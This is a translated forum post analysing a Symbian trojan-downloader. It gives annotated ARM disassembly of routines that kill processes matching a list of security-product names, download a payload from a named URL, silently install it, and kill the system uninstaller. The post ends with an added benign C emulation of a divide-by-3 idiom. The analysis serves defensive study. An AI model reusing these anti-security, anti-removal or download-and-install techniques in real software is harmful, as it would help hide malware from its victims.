[Share] Virus analysis: Trojan-Downloader.SymbOS.Agent.a
Posted: 2012-7-3 15:58 9893
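Virus name: Trojan-Downloader.SymbOS.Agent.a
SHA1: e155055244e734142c2abe7f45f17eb2f6c63889
Platform: Symbian (S60 3rd and 5th)
Analyst: Coderui
Analysis date: 2011-8-28
Summary of the malware's behavior:
Installer behavior: during installation the package presents itself under the software name “Service DS Group”. It creates the autostart entry “[200419A4].rsc” under 101f875a, automatically launches the main malware program “Loader_0x200419A4.exe” once installation completes, and automatically launches the anti-uninstall program “Keep_0x200419A5.exe” on uninstall. It installs the following files on the phone: “!:\sys\bin\Keep_0x200419A5.exe”, “!:\sys\bin\Loader_0x200419A4.exe”, “c:\private\101f875a\import\[200419A4].rsc”, “c:\data\Myapplicationhelp.xml”, “c:\private\200419A4\Version.txt”.
Malware program behavior: on first run it shows the note “诺基亚S60组件安装成功。” (“Nokia S60 component installed successfully.”), which closes automatically after 2 seconds, and then keeps running. It has anti-security-software functionality: in the background it enumerates processes and forcibly terminates the following ones: “Qh360,2002593,s360,2000EED,Agile,MoAshm,NqAv,NqEng,HighCap,NqHc,NQCom,NQPhone,dgserver,Mobile110,QQPim,pw_main,workFire”. It downloads “http://sb.huasky.net/update/load_v1.10.sisx” and saves it as “c:\Data\Others\DocumentLogs.dat”. It renames “c:\Data\Others\DocumentLogs.dat” to “c:\Data\Others\DocumentLogs.sis”. It then silently installs “c:\Data\Others\DocumentLogs.sis” (the downloaded malware) on the phone. The malware resists uninstallation (on uninstall the system automatically runs the Keep_0x200419A5.exe component, which terminates the system uninstaller processes installserver.exe and SWInstSvrUI.exe and shows the message “This is a Nokia S60 update components, please don't deleted!”), so it cannot be removed with the system's built-in uninstall function.
Disassembly of the key points of Loader_0x200419A4.exe (attachment: Loader_0x200419A4.idb):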
----------------------------------------------------------------------------------------------------------------------
On first run, shows the note [诺基亚S60组件安装成功。], which closes automatically after about 2 seconds:
.text:71260E64 0D C0 A0 E1 MOV R12, SP
.text:71260E68 60 D8 2D E9 STMFD SP!, {R5,R6,R11,R12,LR,PC}
.text:71260E6C 04 B0 4C E2 SUB R11, R12, #4
.text:71260E70 01 60 A0 E1 MOV R6, R1
.text:71260E74 1F 08 00 EB BL _ZN14CAknGlobalNote4NewLEv ; CAknGlobalNote::NewL(void)
.text:71260E78 00 50 A0 E1 MOV R5, R0
.text:71260E7C BD 07 00 EB BL _ZN12CleanupStack5PushLEP5CBase ; CleanupStack::PushL(CBase *)
.text:71260E80 05 00 A0 E1 MOV R0, R5
.text:71260E84 06 20 A0 E1 MOV R2, R6
.text:71260E88 01 10 A0 E3 MOV R1, #1
.text:71260E8C E5 07 00 EB BL _ZN14CAknGlobalNote9ShowNoteLE18TAknGlobalNoteTypeRK7TDesC16 ; CAknGlobalNote::ShowNoteL(TAknGlobalNoteType,TDesC16 const&) ; show the pop-up note
.text:71260E90 60 68 9D E8 LDMFD SP, {R5,R6,R11,SP,LR}
.text:71260E94 5D 07 00 EA B _ZN12CleanupStack13PopAndDestroyEv ; CleanupStack::PopAndDestroy(void)
Names of the processes to terminate, anti-security-software [process-name data]:
Qh360,2002593,s360,2000EED,Agile,MoAshm,NqAv,NqEng,HighCap,NqHc,NQCom,NQPhone,dgserver,Mobile110,QQPim,pw_main,workFire
Loop that reads the configured [process name] list and enumerates processes to match against it:
.text:71260DB4 0D C0 A0 E1 MOV R12, SP
.text:71260DB8 F0 D8 2D E9 STMFD SP!, {R4-R7,R11,R12,LR,PC}
.text:71260DBC 04 B0 4C E2 SUB R11, R12, #4
.text:71260DC0 89 7F 4B E2 SUB R7, R11, #-var_224
.text:71260DC4 42 5E 4B E2 SUB R5, R11, #-var_420
.text:71260DC8 01 1C A0 E3 MOV R1, #0x100
.text:71260DCC 00 60 A0 E1 MOV R6, R0
.text:71260DD0 0C 50 45 E2 SUB R5, R5, #0xC
.text:71260DD4 07 00 A0 E1 MOV R0, R7
.text:71260DD8 00 40 A0 E3 MOV R4, #0
.text:71260DDC 41 DE 4D E2 SUB SP, SP, #0x410
.text:71260DE0 98 07 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:71260DE4 01 1C A0 E3 MOV R1, #0x100
.text:71260DE8 05 00 A0 E1 MOV R0, R5
.text:71260DEC 95 07 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:71260DF0 68 00 9F E5 LDR R0, =dword_7126321C
.text:71260DF4 B7 00 00 EB BL nullsub_15
.text:71260DF8 00 20 A0 E1 MOV R2, R0
.text:71260DFC 02 10 A0 E1 MOV R1, R2
.text:71260E00 07 00 A0 E1 MOV R0, R7
.text:71260E04 E1 07 00 EB BL _ZN6TDes164CopyERK7TDesC16 ; TDes16::Copy(TDesC16 const&)
.text:71260E08 01 00 00 EA B loc_71260E14
.text:71260E0C 27 00 54 E3 CMP R4, #0x27 ; '''
.text:71260E10 10 00 00 CA BGT loc_71260E58
.text:71260E14 04 30 A0 E1 MOV R3, R4
.text:71260E18 07 10 A0 E1 MOV R1, R7
.text:71260E1C 05 20 A0 E1 MOV R2, R5
.text:71260E20 06 00 A0 E1 MOV R0, R6
.text:71260E24 9F FF FF EB BL sub_71260CA8
.text:71260E28 00 00 50 E3 CMP R0, #0
.text:71260E2C 01 40 84 E2 ADD R4, R4, #1
.text:71260E30 05 10 A0 E1 MOV R1, R5
.text:71260E34 06 00 A0 E1 MOV R0, R6
.text:71260E38 06 00 00 0A BEQ loc_71260E58
.text:71260E3C 2C 34 1B E5 LDR R3, [R11,#var_42C]
.text:71260E40 0F 32 C3 E3 BIC R3, R3, #0xF0000000
.text:71260E44 02 00 53 E3 CMP R3, #2
.text:71260E48 EF FF FF DA BLE loc_71260E0C
.text:71260E4C 92 FE FF EB BL sub_7126089C ; process-enumeration function [terminates any process whose name matches]
.text:71260E50 27 00 54 E3 CMP R4, #0x27 ; '''
.text:71260E54 EE FF FF DA BLE loc_71260E14
.text:71260E58 1C D0 4B E2 SUB SP, R11, #0x1C
.text:71260E5C F0 A8 9D E8 LDMFD SP, {R4-R7,R11,SP,PC}
Process-enumeration function [terminates any process whose name matches]:
.text:7126089C 0D C0 A0 E1 MOV R12, SP
.text:712608A0 F0 D9 2D E9 STMFD SP!, {R4-R8,R11,R12,LR,PC}
.text:712608A4 04 B0 4C E2 SUB R11, R12, #4
.text:712608A8 8B 6F 4B E2 SUB R6, R11, #-var_22C
.text:712608AC 11 5D 4B E2 SUB R5, R11, #-var_440
.text:712608B0 01 80 A0 E1 MOV R8, R1
.text:712608B4 06 00 A0 E1 MOV R0, R6
.text:712608B8 01 1C A0 E3 MOV R1, #0x100
.text:712608BC 04 50 45 E2 SUB R5, R5, #4
.text:712608C0 11 7D 4B E2 SUB R7, R11, #-var_440
.text:712608C4 04 70 47 E2 SUB R7, R7, #4
.text:712608C8 04 70 47 E2 SUB R7, R7, #4
.text:712608CC 42 DE 4D E2 SUB SP, SP, #0x420
.text:712608D0 0C D0 4D E2 SUB SP, SP, #0xC
.text:712608D4 DB 08 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:712608D8 05 00 A0 E1 MOV R0, R5
.text:712608DC 1B 09 00 EB BL _ZN15TFindHandleBaseC2Ev ; TFindHandleBase::TFindHandleBase(void)
.text:712608E0 06 10 A0 E1 MOV R1, R6
.text:712608E4 05 00 A0 E1 MOV R0, R5
.text:712608E8 E6 08 00 EB BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712608EC 00 40 50 E2 SUBS R4, R0, #0
.text:712608F0 08 10 A0 E1 MOV R1, R8
.text:712608F4 06 00 A0 E1 MOV R0, R6
.text:712608F8 16 00 00 1A BNE loc_71260958
.text:712608FC 51 09 00 EB BL _ZNK7TDesC165FindFERKS_ ; TDesC16::FindF(TDesC16 const&)
.text:71260900 02 31 A0 E3 MOV R3, #0x80000000
.text:71260904 01 00 70 E3 CMN R0, #1
.text:71260908 04 20 A0 E1 MOV R2, R4
.text:7126090C 43 38 A0 E1 MOV R3, R3,ASR#16
.text:71260910 05 10 A0 E1 MOV R1, R5
.text:71260914 07 00 A0 E1 MOV R0, R7
.text:71260918 F0 FF FF 0A BEQ loc_712608E0
.text:7126091C 48 34 0B E5 STR R3, [R11,#var_448]
.text:71260920 44 09 00 EB BL _ZN11RHandleBase4OpenERK15TFindHandleBase10TOwnerType ; RHandleBase::Open(TFindHandleBase const&,TOwnerType)
.text:71260924 00 10 50 E2 SUBS R1, R0, #0
.text:71260928 07 00 A0 E1 MOV R0, R7
.text:7126092C EB FF FF 1A BNE loc_712608E0
.text:71260930 3E 09 00 EB BL _ZN8RProcess4KillEi ; RProcess::Kill(int)
.text:71260934 07 00 A0 E1 MOV R0, R7
.text:71260938 36 09 00 EB BL _ZN11RHandleBase5CloseEv ; RHandleBase::Close(void)
.text:7126093C 06 10 A0 E1 MOV R1, R6
.text:71260940 05 00 A0 E1 MOV R0, R5
.text:71260944 CF 08 00 EB BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:71260948 00 40 50 E2 SUBS R4, R0, #0
.text:7126094C 08 10 A0 E1 MOV R1, R8
.text:71260950 06 00 A0 E1 MOV R0, R6
.text:71260954 E8 FF FF 0A BEQ loc_712608FC
.text:71260958 20 D0 4B E2 SUB SP, R11, #0x20
.text:7126095C F0 A9 9D E8 LDMFD SP, {R4-R8,R11,SP,PC}
File download function [downloads “http://sb.huasky.net/update/load_v1.10.sisx” and saves it as “c:\Data\Others\DocumentLogs.dat”]:
.text:71261238 0D C0 A0 E1 MOV R12, SP
.text:7126123C 70 D8 2D E9 STMFD SP!, {R4-R6,R11,R12,LR,PC}
.text:71261240 04 B0 4C E2 SUB R11, R12, #4
.text:71261244 84 12 9F E5 LDR R1, =0x55555556
.text:71261248 00 50 A0 E1 MOV R5, R0
.text:7126124C C5 DF 4D E2 SUB SP, SP, #0x314
.text:71261250 34 C0 90 E5 LDR R12, [R0,#0x34]
.text:71261254 38 30 9C E5 LDR R3, [R12,#0x38]
.text:71261258 91 E3 C2 E0 SMULL LR, R2, R1, R3
.text:7126125C C3 2F 42 E0 SUB R2, R2, R3,ASR#31
.text:71261260 82 20 82 E0 ADD R2, R2, R2,LSL#1
.text:71261264 03 30 62 E0 RSB R3, R2, R3
.text:71261268 01 00 53 E3 CMP R3, #1
.text:7126126C 00 E0 A0 E3 MOV LR, #0
.text:71261270 73 00 00 0A BEQ loc_71261444
.text:71261274 38 10 9C E5 LDR R1, [R12,#0x38]
.text:71261278 50 22 9F E5 LDR R2, =0x55555556
.text:7126127C 92 01 C3 E0 SMULL R0, R3, R2, R1
.text:71261280 C1 3F 43 E0 SUB R3, R3, R1,ASR#31
.text:71261284 83 30 83 E0 ADD R3, R3, R3,LSL#1
.text:71261288 03 00 51 E1 CMP R1, R3
.text:7126128C 01 00 00 1A BNE loc_71261298
.text:71261290 00 00 5E E3 CMP LR, #0
.text:71261294 60 00 00 0A BEQ loc_7126141C
.text:71261298 38 30 9C E5 LDR R3, [R12,#0x38]
.text:7126129C 2C 12 9F E5 LDR R1, =0x55555556
.text:712612A0 91 03 C2 E0 SMULL R0, R2, R1, R3
.text:712612A4 C3 2F 42 E0 SUB R2, R2, R3,ASR#31
.text:712612A8 82 20 82 E0 ADD R2, R2, R2,LSL#1
.text:712612AC 03 30 62 E0 RSB R3, R2, R3
.text:712612B0 02 00 53 E3 CMP R3, #2
.text:712612B4 42 00 00 0A BEQ loc_712613C4
.text:712612B8 08 60 85 E2 ADD R6, R5, #8
.text:712612BC 0E 20 A0 E1 MOV R2, LR
.text:712612C0 01 10 A0 E3 MOV R1, #1
.text:712612C4 06 00 A0 E1 MOV R0, R6
.text:712612C8 A8 06 00 EB BL _ZN16RHttpDownloadMgr15SetIntAttributeEjl ; RHttpDownloadMgr::SetIntAttribute(uint,long)
.text:712612CC 49 4F 4B E2 SUB R4, R11, #-var_124
.text:712612D0 76 06 00 EB BL _ZN4User12LeaveIfErrorEi ; User::LeaveIfError(int)
.text:712612D4 01 1C A0 E3 MOV R1, #0x100
.text:712612D8 04 00 A0 E1 MOV R0, R4
.text:712612DC A1 06 00 EB BL _ZN9TBufBase8C2Ei ; TBufBase8::TBufBase8(int)
.text:712612E0 EC 01 9F E5 LDR R0, =dword_712635B0
.text:712612E4 43 02 00 EB BL nullsub_19
.text:712612E8 00 20 A0 E1 MOV R2, R0
.text:712612EC 02 10 A0 E1 MOV R1, R2
.text:712612F0 04 00 A0 E1 MOV R0, R4
.text:712612F4 E5 06 00 EB BL _ZN5TDes84CopyERK6TDesC8 ; TDes8::Copy(TDesC8 const&)
.text:712612F8 06 00 A0 E1 MOV R0, R6
.text:712612FC 39 06 00 EB BL _ZN16RHttpDownloadMgr9DeleteAllEv ; RHttpDownloadMgr::DeleteAll(void)
.text:71261300 04 20 85 E2 ADD R2, R5, #4
.text:71261304 04 10 A0 E1 MOV R1, R4
.text:71261308 06 00 A0 E1 MOV R0, R6
.text:7126130C E9 06 00 EB BL _ZN16RHttpDownloadMgr15CreateDownloadLERK6TDesC8Ri ; RHttpDownloadMgr::CreateDownloadL(TDesC8 const&,int &)
.text:71261310 00 60 A0 E1 MOV R6, R0
.text:71261314 BC 01 9F E5 LDR R0, =dword_71263540
.text:71261318 33 02 00 EB BL nullsub_16
.text:7126131C CB 4F 4B E2 SUB R4, R11, #-var_32C
.text:71261320 00 10 A0 E1 MOV R1, R0
.text:71261324 34 00 95 E5 LDR R0, [R5,#0x34]
.text:71261328 8C FD FF EB BL sub_71260960
.text:7126132C 01 1C A0 E3 MOV R1, #0x100
.text:71261330 04 00 A0 E1 MOV R0, R4
.text:71261334 43 06 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:71261338 9C 01 9F E5 LDR R0, =dword_712634FC
.text:7126133C 2C FF FF EB BL nullsub_11
.text:71261340 00 20 A0 E1 MOV R2, R0
.text:71261344 02 10 A0 E1 MOV R1, R2
.text:71261348 04 00 A0 E1 MOV R0, R4
.text:7126134C 8F 06 00 EB BL _ZN6TDes164CopyERK7TDesC16 ; TDes16::Copy(TDesC16 const&)
.text:71261350 04 20 A0 E1 MOV R2, R4
.text:71261354 CF 10 A0 E3 MOV R1, #0xCF ; '?
.text:71261358 06 00 A0 E1 MOV R0, R6
.text:7126135C 2F 06 00 EB BL _ZN13RHttpDownload18SetStringAttributeEjRK7TDesC16 ; RHttpDownload::SetStringAttribute(uint,TDesC16 const&)
.text:71261360 FA 1F A0 E3 03+MOV R1, 0x3EB
.text:71261368 01 20 A0 E3 MOV R2, #1
.text:7126136C 06 00 A0 E1 MOV R0, R6
.text:71261370 9C 06 00 EB BL _ZN13RHttpDownload15SetIntAttributeEjl ; RHttpDownload::SetIntAttribute(uint,long)
.text:71261374 3F 1E A0 E3 MOV R1, #0x3F0
.text:71261378 01 20 A0 E3 MOV R2, #1
.text:7126137C 06 00 A0 E1 MOV R0, R6
.text:71261380 84 06 00 EB BL _ZN13RHttpDownload16SetBoolAttributeEji ; RHttpDownload::SetBoolAttribute(uint,int)
.text:71261384 3F 1E A0 E3 MOV R1, #0x3F0
.text:71261388 06 00 A0 E1 MOV R0, R6
.text:7126138C 01 10 81 E2 ADD R1, R1, #1
.text:71261390 01 20 A0 E3 MOV R2, #1
.text:71261394 7F 06 00 EB BL _ZN13RHttpDownload16SetBoolAttributeEji ; RHttpDownload::SetBoolAttribute(uint,int)
.text:71261398 04 30 95 E5 LDR R3, [R5,#4]
.text:7126139C 00 00 53 E3 CMP R3, #0
.text:712613A0 03 00 00 0A BEQ loc_712613B4
.text:712613A4 06 00 A0 E1 MOV R0, R6
.text:712613A8 14 06 00 EB BL _ZN13RHttpDownload5StartEv ; RHttpDownload::Start(void) ; start the download
.text:712613AC 18 D0 4B E2 SUB SP, R11, #0x18
.text:712613B0 70 A8 9D E8 LDMFD SP, {R4-R6,R11,SP,PC} ; return
File rename [renames “c:\Data\Others\DocumentLogs.dat” to “c:\Data\Others\DocumentLogs.sis”]:
.text:71260A68 5C 08 00 EB BL _ZN9BaflUtils10RenameFileER3RFsRK7TDesC16S4_j ; BaflUtils::RenameFile(RFs &,TDesC16 const&,TDesC16 const&,uint)
Silent install [installs the downloaded file “c:\Data\Others\DocumentLogs.sis”]:
.text:71261644 BF 05 00 EB BL SWInstCli_4 ; install the downloaded file “c:\Data\Others\DocumentLogs.sis”
Conditional selection, function dispatch (switch):
.text:712604CC 0D C0 A0 E1 MOV R12, SP
.text:712604D0 30 D8 2D E9 STMFD SP!, {R4,R5,R11,R12,LR,PC}
.text:712604D4 04 B0 4C E2 SUB R11, R12, #4
.text:712604D8 00 40 A0 E1 MOV R4, R0
.text:712604DC 1C 30 90 E5 LDR R3, [R0,#0x1C]
.text:712604E0 00 00 53 E3 CMP R3, #0
.text:712604E4 10 00 00 0A BEQ loc_7126052C ; process-enumeration function [terminates any process whose name matches]
.text:712604E8 01 00 53 E3 CMP R3, #1
.text:712604EC 7A 00 00 0A BEQ loc_712606DC
.text:712604F0 02 00 53 E3 CMP R3, #2
.text:712604F4 22 00 00 0A BEQ loc_71260584
.text:712604F8 03 00 53 E3 CMP R3, #3
.text:712604FC 92 00 00 0A BEQ loc_7126074C ; download the file
.text:71260500 04 00 53 E3 CMP R3, #4
.text:71260504 59 00 00 0A BEQ loc_71260670
.text:71260508 05 00 53 E3 CMP R3, #5
.text:7126050C 50 00 00 0A BEQ loc_71260654
.text:71260510 06 00 53 E3 CMP R3, #6
.text:71260514 12 00 00 1A BNE loc_71260564
.text:71260518 90 02 9F E5 LDR R0, =dword_71263018
.text:7126051C B6 02 00 EB BL nullsub_13
.text:71260520 08 FF FF EB BL nullsub_2
.text:71260524 BF 09 00 EB BL _ZN16CActiveScheduler4StopEv ; CActiveScheduler::Stop(void)
.text:71260528 0D 00 00 EA B loc_71260564
----------------------------------------------------------------------------------------------------------------------
Disassembly of the key points of Keep_0x200419A5.exe (attachment: Keep_0x200419A5.idb):
----------------------------------------------------------------------------------------------------------------------
Core of the user code:
.text:712F81C0 MOV R12, SP
.text:712F81C4 STMFD SP!, {R11,R12,LR,PC}
.text:712F81C8 LDR R0, =dword_712F9318
.text:712F81CC SUB R11, R12, #4
.text:712F81D0 BL Coderui_sub_1 ; anti-uninstall: enumerate and terminate the listed processes (installserver.exe, SWInstSvrUI.exe)
.text:712F81D4 LDR R0, =dword_712F92F0
.text:712F81D8 BL nullsub_1
.text:712F81DC BL Coderui_sub_1 ; anti-uninstall: enumerate and terminate the listed processes (installserver.exe, SWInstSvrUI.exe)
.text:712F81E0 LDR R0, =dword_712F933C
.text:712F81E4 BL nullsub_2
.text:712F81E8 BL Coderui_sub_2 ; show the message: This is a Nokia S60 update components, please don't deleted!
.text:712F81EC LDR R0, =dword_712F92C0
.text:712F81F0 BL nullsub_3
.text:712F81F4 LDMFD SP, {R11,SP,LR}
.text:712F81F8 B sub_712F8030
Anti-uninstall: enumerate and terminate the listed processes (installserver.exe, SWInstSvrUI.exe):
.text:712F80C8 MOV R12, SP
.text:712F80CC STMFD SP!, {R4-R8,R11,R12,LR,PC}
.text:712F80D0 SUB R11, R12, #4
.text:712F80D4 SUB R6, R11, #-var_22C
.text:712F80D8 SUB R5, R11, #-var_440
.text:712F80DC MOV R1, #0x100
.text:712F80E0 MOV R8, R0
.text:712F80E4 SUB R5, R5, #4
.text:712F80E8 MOV R0, R6
.text:712F80EC SUB R7, R11, #-var_440
.text:712F80F0 SUB R7, R7, #4
.text:712F80F4 SUB R7, R7, #4
.text:712F80F8 SUB SP, SP, #0x420
.text:712F80FC SUB SP, SP, #0xC
.text:712F8100 BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:712F8104 MOV R0, R5
.text:712F8108 BL _ZN15TFindHandleBaseC2Ev ; TFindHandleBase::TFindHandleBase(void)
.text:712F810C MOV R1, R6
.text:712F8110 MOV R0, R5
.text:712F8114 BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712F8118 SUBS R4, R0, #0
.text:712F811C MOV R1, R8
.text:712F8120 MOV R0, R6
.text:712F8124 BNE loc_712F8184
.text:712F8128 BL _ZNK7TDesC165FindFERKS_ ; TDesC16::FindF(TDesC16 const&)
.text:712F812C MOV R3, #0x80000000
.text:712F8130 CMN R0, #1
.text:712F8134 MOV R2, R4
.text:712F8138 MOV R3, R3,ASR#16
.text:712F813C MOV R1, R5
.text:712F8140 MOV R0, R7
.text:712F8144 BEQ loc_712F810C
.text:712F8148 STR R3, [R11,#var_448]
.text:712F814C BL _ZN11RHandleBase4OpenERK15TFindHandleBase10TOwnerType ; RHandleBase::Open(TFindHandleBase const&,TOwnerType)
.text:712F8150 SUBS R1, R0, #0
.text:712F8154 MOV R0, R7
.text:712F8158 BNE loc_712F810C
.text:712F815C BL _ZN8RProcess4KillEi ; RProcess::Kill(int)
.text:712F8160 MOV R0, R7
.text:712F8164 BL _ZN11RHandleBase5CloseEv ; RHandleBase::Close(void)
.text:712F8168 MOV R1, R6
.text:712F816C MOV R0, R5
.text:712F8170 BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712F8174 SUBS R4, R0, #0
.text:712F8178 MOV R1, R8
.text:712F817C MOV R0, R6
.text:712F8180 BEQ loc_712F8128
.text:712F8184 SUB SP, R11, #0x20
.text:712F8188 LDMFD SP, {R4-R8,R11,SP,PC}
Show the message: This is a Nokia S60 update components, please don't deleted!:
.text:712F818C MOV R12, SP
.text:712F8190 STMFD SP!, {R5,R7,R11,R12,LR,PC}
.text:712F8194 SUB R11, R12, #4
.text:712F8198 MOV R7, R0
.text:712F819C BL _ZN14CAknGlobalNote4NewLEv ; CAknGlobalNote::NewL(void)
.text:712F81A0 MOV R5, R0
.text:712F81A4 BL _ZN12CleanupStack5PushLEP5CBase ; CleanupStack::PushL(CBase *)
.text:712F81A8 MOV R0, R5
.text:712F81AC MOV R2, R7
.text:712F81B0 MOV R1, #1
.text:712F81B4 BL _ZN14CAknGlobalNote9ShowNoteLE18TAknGlobalNoteTypeRK7TDesC16 ; CAknGlobalNote::ShowNoteL(TAknGlobalNoteType,TDesC16 const&)
.text:712F81B8 LDMFD SP, {R5,R7,R11,SP,LR}
.text:712F81BC B _ZN12CleanupStack13PopAndDestroyEv ; CleanupStack::PopAndDestroy(void)
----------------------------------------------------------------------------------------------------------------------
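Added example (not part of the original post and not the sample's own code): the download function at 71261238 opens with three tests built on the constant 0x55555556, the compiler's idiom for signed division by 3. The C below emulates that instruction sequence and maps the resulting remainder to the branch labels in the listing; the sample inputs are constructed, and the page does not say what the word at [R12,#0x38] represents.

```c
#include <stdint.h>
#include <stdio.h>

/* SMULL: signed 32x32 -> 64-bit multiply; returns the high word (R2 in the listing). */
static int32_t smull_hi(int32_t a, int32_t b) {
    uint64_t p = (uint64_t)((int64_t)a * (int64_t)b);
    return (int32_t)(uint32_t)(p >> 32);
}

/* Emulates 71261244..71261264:
 *   LDR R1,=0x55555556 / SMULL LR,R2,R1,R3 / SUB R2,R2,R3,ASR#31
 *   ADD R2,R2,R2,LSL#1 / RSB R3,R2,R3
 * Returns R3 after the RSB: the signed remainder of x divided by 3. */
int32_t emu_rem3(int32_t x) {
    int32_t q = smull_hi(0x55555556, x);       /* x/3 rounded toward -infinity */
    q -= (x < 0) ? -1 : 0;                     /* R3,ASR#31 is -1 when x < 0   */
    int32_t q3 = (int32_t)((uint32_t)q * 3u);  /* q + (q << 1)                 */
    return (int32_t)((uint32_t)x - (uint32_t)q3);
}

/* Branch selected by the three CMP/BEQ tests at the top of the routine.
 * Labels are those in the listing; "712612B8" is the fall-through address. */
const char *branch_for(int32_t x) {
    switch (emu_rem3(x)) {
    case 1:  return "loc_71261444";  /* CMP R3,#1 / BEQ                          */
    case 0:  return "loc_7126141C";  /* CMP R1,R3, then LR==0 (set at 7126126C)  */
    case 2:  return "loc_712613C4";  /* CMP R3,#2 / BEQ                          */
    default: return "712612B8";      /* no test matched (negative remainder)     */
    }
}

int main(void) {
    /* Constructed sample values for the word loaded from [R12,#0x38]. */
    int32_t samples[] = {0, 1, 2, 3, 7, -7, INT32_MAX, INT32_MIN};
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%11d  rem=%2d  -> %s\n", (int)samples[i],
               (int)emu_rem3(samples[i]), branch_for(samples[i]));
    return 0;
}
```

Recognising the SMULL/SUB/ADD/RSB group as `x % 3` lets the three comparisons be read as a three-way dispatch on that word rather than as opaque arithmetic.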